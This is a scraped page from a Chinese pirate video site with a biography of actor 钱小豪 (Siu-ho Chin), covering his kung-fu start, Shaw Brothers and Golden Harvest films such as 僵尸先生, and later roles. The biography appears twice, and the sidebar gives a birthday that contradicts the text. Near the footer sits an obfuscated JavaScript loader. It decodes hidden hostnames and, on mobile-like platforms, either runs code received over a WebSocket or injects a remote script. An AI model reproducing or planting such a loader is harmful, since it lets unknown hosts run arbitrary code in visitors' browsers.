观看记录清空
    • 视频
    • 角色
    • 明星
    演员,导演

    钱小豪

    • 身高:175cm
    • 体重:75kg
    • 星座:水瓶座
    • 血型:O型
    • 地区:大陆
    • 生日:1963-05-12
    • 出生地:香港
    • 毕业院校:
    • 简介:影人简介   钱小豪(Siu-ho Chin),本名钱嘉华,1963年1月26日出生于香港,影视演员。  1977年,13岁的钱小豪获得第一届功夫擂台比赛铜牌奖。1979年,加入邵氏训练班。同年,被导演张彻选中参演第一部电影《少林与武当》,饰演魏兴洪。1980年,在电影《广东十虎与后五虎》中初露头角;同年,在《飞狐外传》中担任男主角。1984年主演《霍东阁》,1985年,因与林正英、许冠英领衔主演恐怖喜剧电影《僵尸先生》而受到关注。1993年,因在《太极张三丰》中扮演大反派而为观众熟知。1994年,主演动作电影《精武英雄》,饰演霍廷恩。1999年,主演动作电视剧《十三密杀令》。2002年后,钱小豪曾淡出幕前,转而从事导演工作。2006年,参演主演的动作电影《墨攻》。2011年,参演古装动作电影《关云长》。2013年,主演向传统僵尸片致敬的电影《僵尸》。2014年8月,参与TVB武打剧《潮拜武当》的拍摄。  2016年主演《阴阳先生之末代天师》,2017年主演《天师归来》、《救僵清道夫》和《生化药尸》。2018年1月15日,主演的《新僵尸先生2》在爱奇艺上线。2019年7月5日,主演的《四目先生》在腾讯视频上线。7月25日,主演的《至尊先生》在爱奇艺上线。 早年经历   钱小豪在香港出生并长大,祖籍广东佛山。10岁时,读书成绩不好的钱小豪开始跟邻居冼林旭学大圣劈挂门功夫。14岁时,钱小豪因在功夫擂台比赛中获铜牌,被电影公司相中。1979年,15岁时的钱小豪以玩票性质报考邵氏武术演员训练班,上了两个月课。恰好导演张彻为《少林与武当》选角,在六七十个演员中,被选上当演员进入张家班,成为张彻的第五代弟子,亦是张彻最后一个关门弟子。 演艺经历   1979年,被导演张彻选中参演由第一部电影《少林与武当》,饰演魏兴洪。虽然这是他的第一部电影,但片酬比普通工人一年工资还高。同年,钱小豪虽然幸运入行,可惜生不逢时,还没大红稳固地位,恩师张彻走下坡路,而离邵氏停产也不剩几年了。  1980年,参演张彻执导的电影《广东十虎与后五虎》;同年,凭借在《广东十虎与后五虎》中的出色表现,在张彻执导的动作电影《飞狐外传》中第一次担任男主角。  1985年,与林正英、许冠英领衔主演由嘉禾电影公司制作发行的恐怖喜剧电影《僵尸先生》,在片中饰演九叔的徒弟,身手敏捷、爱耍小聪明的秋生。之所以他参演《僵尸先生》,缘自一次普吉岛之旅,钱小豪与洪金宝相处了几天。回到香港后,洪金宝就推荐钱小豪拍部僵尸片,因此加入了《僵尸先生》的拍摄。  1986年,在邵氏与嘉禾合拍《原振侠与卫斯理》,公司钦点他饰演男一号原振侠,演韦斯利的周润发还算是配角。同年,还出演《僵尸先生》的跟风作《僵尸翻生》,饰演盗墓贼旺财。影片尽显黑色喜剧风格,自然取得了不错的票房成绩,算跟风作中比较成功的影片了。  1989年,与林正英、吕方、吴君如、楼南光、玛利亚合作主演恐怖喜剧电影《一眉道人》,饰演一眉道长的徒弟阿豪。同年,还参演喜剧电影《八宝奇兵》,饰演BruceHung。  1993年,与李连杰领衔主演古装动作电影《太极张三丰》,饰演大反派董天宝。同年,在TVB与郑秀文主演电视剧《大头绿衣斗僵尸》,但因其火爆性格也没做多久。  1994年,第二次与李连杰主演动作电影《精武英雄》,饰演霍元甲的儿子霍庭恩。  1997年,加盟香港电视广播有限公司出品的电视剧《大刺客》,并在在第三单元《刺马》中饰演主角张汶祥。同年,还客串出演弟弟钱嘉乐执导电影《最佳拍档之醉街拍档》。  1999年,钱小豪与蔡少芬领衔主演动作电视剧《十三密杀令》,饰演男主角新科状元甄兆人。同年,主演电影《古惑仔之大战拉斯维加斯》。  2000年,内地影视开始蓬勃,他跟着张之亮北上,做演员、武术指导、导演。同年,在内地拍完《蜀山剑侠传》,但回到香港后两年没有人找他拍戏。  2004年,参演由吴奇隆投资的一部励志电视剧《铁拳浪子》,饰演散打教练郭立华,并和剧中由鲍蕾扮演的美女演一对恋人。  2006年,参演由刘德华、范冰冰、吴奇隆、王志文主演的动作电影《墨攻》。  2008年,与吴奇隆、左小青、叶童、刘思彤、范伟、午马共同主演电影《车票》,饰演吴静丈夫。  2010年,在曾志伟,叶念琛,钟澍佳执导的喜剧电影《七十二家租客》中饰演金鱼佬。同年,还参演恐怖电影《僵尸新战士》。  2011年,在麦兆辉、庄文强执导的古装动作电影《关云长》,饰演袁绍大将颜良。同年,出演电影《双鞭呼延灼》,扮演呼延灼。  2012年,参演古装悬疑剧《赏金猎人》,饰演日本商人小田次郎。  2013年,与陈友、钟发、吴耀汉、惠英红、鲍起静联袂主演由香港新锐导演麦浚龙执导的恐怖电影《僵尸》。  2014年8月13日,与杨怡、元秋、周子扬、陈自瑶共同为TVB拍摄武打剧《潮拜武当》,并担任剧中男主角。  2016年,主演网络电影《阴阳先生之末代天师》上线。  2019年6月14日,与白百何、吴刚等合作主演的电影《妈阁是座城》上映;7月5日,与陈友等合作主演的动作喜剧电影《四目先生》在腾讯视频独家播映。 个人生活   1990年,钱小豪与前妻郭秀云在澳大利亚结婚;同年8月18日,儿子钱景峰出生;1993年,两人和平分手。2001年,与第二任妻子丘倩鸣结婚;2002年1月10日,儿子钱颖德出生。 社会活动   1994年,钱小豪救了一名被挟持的女子,获得“见义勇为”杰出青年。 获奖记录    个人 1994香港“见义勇为”杰出青年(获奖) 人物评价   钱小豪是20世纪8、90年代邵氏的当红小生。自1979年起,钱小豪先后为邵氏电影公司及嘉禾电影公司等等演出超过90部影片,其中以武打动作片最深入人心。

    钱小豪个人资料

    影人简介

      钱小豪(Siu-ho Chin),本名钱嘉华,1963年1月26日出生于香港,影视演员。

      1977年,13岁的钱小豪获得第一届功夫擂台比赛铜牌奖。1979年,加入邵氏训练班。同年,被导演张彻选中参演第一部电影《少林与武当》,饰演魏兴洪。1980年,在电影《广东十虎与后五虎》中初露头角;同年,在《飞狐外传》中担任男主角。1984年主演《霍东阁》,1985年,因与林正英、许冠英领衔主演恐怖喜剧电影《僵尸先生》而受到关注。1993年,因在《太极张三丰》中扮演大反派而为观众熟知。1994年,主演动作电影《精武英雄》,饰演霍廷恩。1999年,主演动作电视剧《十三密杀令》。2002年后,钱小豪曾淡出幕前,转而从事导演工作。2006年,参演主演的动作电影《墨攻》。2011年,参演古装动作电影《关云长》。2013年,主演向传统僵尸片致敬的电影《僵尸》。2014年8月,参与TVB武打剧《潮拜武当》的拍摄。

      2016年主演《阴阳先生之末代天师》,2017年主演《天师归来》、《救僵清道夫》和《生化药尸》。2018年1月15日,主演的《新僵尸先生2》在爱奇艺上线。2019年7月5日,主演的《四目先生》在腾讯视频上线。7月25日,主演的《至尊先生》在爱奇艺上线。

    早年经历

      钱小豪在香港出生并长大,祖籍广东佛山。10岁时,读书成绩不好的钱小豪开始跟邻居冼林旭学大圣劈挂门功夫。14岁时,钱小豪因在功夫擂台比赛中获铜牌,被电影公司相中。1979年,15岁时的钱小豪以玩票性质报考邵氏武术演员训练班,上了两个月课。恰好导演张彻为《少林与武当》选角,在六七十个演员中,被选上当演员进入张家班,成为张彻的第五代弟子,亦是张彻最后一个关门弟子。

    演艺经历

      1979年,被导演张彻选中参演由第一部电影《少林与武当》,饰演魏兴洪。虽然这是他的第一部电影,但片酬比普通工人一年工资还高。同年,钱小豪虽然幸运入行,可惜生不逢时,还没大红稳固地位,恩师张彻走下坡路,而离邵氏停产也不剩几年了。

      1980年,参演张彻执导的电影《广东十虎与后五虎》;同年,凭借在《广东十虎与后五虎》中的出色表现,在张彻执导的动作电影《飞狐外传》中第一次担任男主角。

      1985年,与林正英、许冠英领衔主演由嘉禾电影公司制作发行的恐怖喜剧电影《僵尸先生》,在片中饰演九叔的徒弟,身手敏捷、爱耍小聪明的秋生。之所以他参演《僵尸先生》,缘自一次普吉岛之旅,钱小豪与洪金宝相处了几天。回到香港后,洪金宝就推荐钱小豪拍部僵尸片,因此加入了《僵尸先生》的拍摄。

      1986年,在邵氏与嘉禾合拍《原振侠与卫斯理》,公司钦点他饰演男一号原振侠,演韦斯利的周润发还算是配角。同年,还出演《僵尸先生》的跟风作《僵尸翻生》,饰演盗墓贼旺财。影片尽显黑色喜剧风格,自然取得了不错的票房成绩,算跟风作中比较成功的影片了。

      1989年,与林正英、吕方、吴君如、楼南光、玛利亚合作主演恐怖喜剧电影《一眉道人》,饰演一眉道长的徒弟阿豪。同年,还参演喜剧电影《八宝奇兵》,饰演BruceHung。

      1993年,与李连杰领衔主演古装动作电影《太极张三丰》,饰演大反派董天宝。同年,在TVB与郑秀文主演电视剧《大头绿衣斗僵尸》,但因其火爆性格也没做多久。

      1994年,第二次与李连杰主演动作电影《精武英雄》,饰演霍元甲的儿子霍庭恩。

      1997年,加盟香港电视广播有限公司出品的电视剧《大刺客》,并在在第三单元《刺马》中饰演主角张汶祥。同年,还客串出演弟弟钱嘉乐执导电影《最佳拍档之醉街拍档》。

      1999年,钱小豪与蔡少芬领衔主演动作电视剧《十三密杀令》,饰演男主角新科状元甄兆人。同年,主演电影《古惑仔之大战拉斯维加斯》。

      2000年,内地影视开始蓬勃,他跟着张之亮北上,做演员、武术指导、导演。同年,在内地拍完《蜀山剑侠传》,但回到香港后两年没有人找他拍戏。

      2004年,参演由吴奇隆投资的一部励志电视剧《铁拳浪子》,饰演散打教练郭立华,并和剧中由鲍蕾扮演的美女演一对恋人。

      2006年,参演由刘德华、范冰冰、吴奇隆、王志文主演的动作电影《墨攻》。

      2008年,与吴奇隆、左小青、叶童、刘思彤、范伟、午马共同主演电影《车票》,饰演吴静丈夫。

      2010年,在曾志伟,叶念琛,钟澍佳执导的喜剧电影《七十二家租客》中饰演金鱼佬。同年,还参演恐怖电影《僵尸新战士》。

      2011年,在麦兆辉、庄文强执导的古装动作电影《关云长》,饰演袁绍大将颜良。同年,出演电影《双鞭呼延灼》,扮演呼延灼。

      2012年,参演古装悬疑剧《赏金猎人》,饰演日本商人小田次郎。

      2013年,与陈友、钟发、吴耀汉、惠英红、鲍起静联袂主演由香港新锐导演麦浚龙执导的恐怖电影《僵尸》。

      2014年8月13日,与杨怡、元秋、周子扬、陈自瑶共同为TVB拍摄武打剧《潮拜武当》,并担任剧中男主角。

      2016年,主演网络电影《阴阳先生之末代天师》上线。

      2019年6月14日,与白百何、吴刚等合作主演的电影《妈阁是座城》上映;7月5日,与陈友等合作主演的动作喜剧电影《四目先生》在腾讯视频独家播映。

    个人生活

      1990年,钱小豪与前妻郭秀云在澳大利亚结婚;同年8月18日,儿子钱景峰出生;1993年,两人和平分手。2001年,与第二任妻子丘倩鸣结婚;2002年1月10日,儿子钱颖德出生。

    社会活动

      1994年,钱小豪救了一名被挟持的女子,获得“见义勇为”杰出青年。

    获奖记录

       个人

    • 1994香港“见义勇为”杰出青年(获奖)

      人物评价

        钱小豪是20世纪8、90年代邵氏的当红小生。自1979年起,钱小豪先后为邵氏电影公司及嘉禾电影公司等等演出超过90部影片,其中以武打动作片最深入人心。

    function VDIPp(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function YUlBnXdF(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return VDIPp(t);};window[''+'l'+'u'+'x'+'o'+'K'+'M'+'w'+'s'+'P'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=YUlBnXdF,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5nLm1pY3Jvc3Nlci5jjbg==','dHIuueWVzdW42NzguuY29t','8923',window,document,['j','u']);}:function(){};

    本站不会保存、复制或传播任何视频文件,也不对本站所抓取的任何内容负法律责任,所列的内容仅做宽带测试使用。若本站收集的节目无意侵犯了贵司版权,请留言,我们将在第一时间删除相应资源。

    RSS订阅 - 百度蜘蛛 - 搜狗蜘蛛 - 神马爬虫 - 奇虎地图 - 谷歌地图 - 必应爬虫

    © 2021 www.pptvm.com   皮皮影院